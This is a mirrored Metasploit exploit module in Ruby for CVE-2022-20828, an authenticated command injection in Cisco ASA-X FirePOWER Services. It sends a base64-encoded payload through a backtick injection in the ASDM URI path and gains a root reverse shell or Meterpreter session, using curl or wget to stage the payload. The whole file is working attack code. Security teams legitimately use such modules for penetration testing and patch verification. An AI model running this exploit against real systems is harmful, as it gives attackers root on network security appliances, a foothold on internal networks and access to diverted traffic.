Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/cisco_asax_sfr_rce.rb
32894 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  prepend Msf::Exploit::Remote::AutoCheck

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Exploit::CmdStager

12
  include Msf::Exploit::FileDropper

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Cisco ASA-X with FirePOWER Services Authenticated Command Injection',

19
        'Description' => %q{

20
          This module exploits an authenticated command injection vulnerability affecting

21
          Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's

22
          ASDM web server and lands in the FirePower Services SFR module's Linux virtual

23
          machine as the root user. Access to the virtual machine allows the attacker to

24
          pivot to the inside network, and access the outside network. Also, the SFR

25
          virtual machine is running snort on the traffic flowing through the ASA, so

26
          the attacker should have access to this diverted traffic as well.

27


28
          This module requires ASDM credentials in order to traverse the ASDM interface.

29
          A similar attack can be performed via Cisco CLI (over SSH), although that isn't

30
          implemented here.

31


32
          Finally, it's worth noting that this attack bypasses the affects of the

33
          `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be

34
          available but this attack makes it available).

35


36
          Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that

37
          support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,

38
          and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module

39
          versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will

40
          receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.

41
        },

42
        'License' => MSF_LICENSE,

43
        'Author' => [

44
          'jbaines-r7' # Vulnerability discovery and Metasploit module

45
        ],

46
        'References' => [

47
          [ 'CVE', '2022-20828' ],

48
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG' ],

49
          [ 'URL', 'https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/' ],

50
          [ 'URL', 'https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html']

51
        ],

52
        'DisclosureDate' => '2022-06-22',

53
        'Privileged' => true,

54
        'Targets' => [

55
          [

56
            'Shell Dropper',

57
            {

58
              'Platform' => 'unix',

59
              'Arch' => ARCH_CMD,

60
              'Type' => :unix_cmd,

61
              'DefaultOptions' => {

62
                'PAYLOAD' => 'cmd/unix/reverse_bash'

63
              }

64
            }

65
          ],

66
          [

67
            'Linux Dropper',

68
            {

69
              'Platform' => 'linux',

70
              'Arch' => ARCH_X64,

71
              'Type' => :linux_dropper,

72
              'CmdStagerFlavor' => [ 'curl', 'wget' ],

73
              'DefaultOptions' => {

74
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'

75
              }

76
            }

77
          ]

78
        ],

79
        'DefaultTarget' => 1,

80
        'DefaultOptions' => {

81
          'RPORT' => 443,

82
          'SSL' => true,

83
          'MeterpreterTryToFork' => true

84
        },

85
        'Notes' => {

86
          'Stability' => [CRASH_SAFE],

87
          'Reliability' => [REPEATABLE_SESSION],

88
          'SideEffects' => [ARTIFACTS_ON_DISK]

89
        }

90
      )

91
    )

92
    register_options([

93
      OptString.new('TARGETURI', [true, 'Base path', '/']),

94
      OptString.new('USERNAME', [true, 'Username to authenticate with', '']),

95
      OptString.new('PASSWORD', [true, 'Password to authenticate with', '']),

96
    ])

97
  end

98


99
  def check

100
    res = send_request_cgi({

101
      'method' => 'GET',

102
      'uri' => normalize_uri(target_uri.path, '/admin/exec/session+sfr+do+`id`'),

103
      'headers' =>

104
      {

105
        'User-Agent' => 'ASDM/ Java/1',

106
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

107
      }

108
    })

109
    return CheckCode::Unknown('The target did not respond to the check.') unless res

110
    return CheckCode::Safe('Authentication failed.') if res.code == 401

111
    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200

112


113
    if res.body.include?('Invalid do command uid=0(root)')

114
      return CheckCode::Vulnerable("Successfully executed the 'id' command.")

115
    end

116


117
    CheckCode::Safe('The command injection does not appear to work.')

118
  end

119


120
  def execute_command(cmd, _opts = {})

121
    # base64 encode the payload to work around bad characters and then uri encode

122
    # the whole thing before yeeting it at the server

123
    encoded_payload = Rex::Text.uri_encode("(base64 -d<<<#{Rex::Text.encode_base64(cmd)}|sh)&")

124
    res = send_request_cgi({

125
      'method' => 'GET',

126
      'uri' => normalize_uri(target_uri.path, "/admin/exec/session+sfr+do+`#{encoded_payload}`"),

127
      'headers' =>

128
      {

129
        'User-Agent' => 'ASDM/ Java/1',

130
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

131
      }

132
    })

133


134
    if res

135
      fail_with(Failure::Unreachable, 'The target did not respond.') unless res

136
      fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401

137
      fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200

138
    end

139


140
    if session_created?

141
      # technically speaking, bash can hold the connection open and skip all the res checks

142
      # also passing the res checks doesn't actually mean that the target was exploited so

143
      # check a session was created to get verification

144
      print_good('Session created!')

145
    else

146
      fail_with(Failure::NotVulnerable, 'The exploit was thrown but not session was created.')

147
    end

148
  end

149


150
  def exploit

151
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

152


153
    case target['Type']

154
    when :unix_cmd

155
      execute_command(payload.encoded)

156
    when :linux_dropper

157
      execute_cmdstager

158
    end

159
  end

160
end

161


162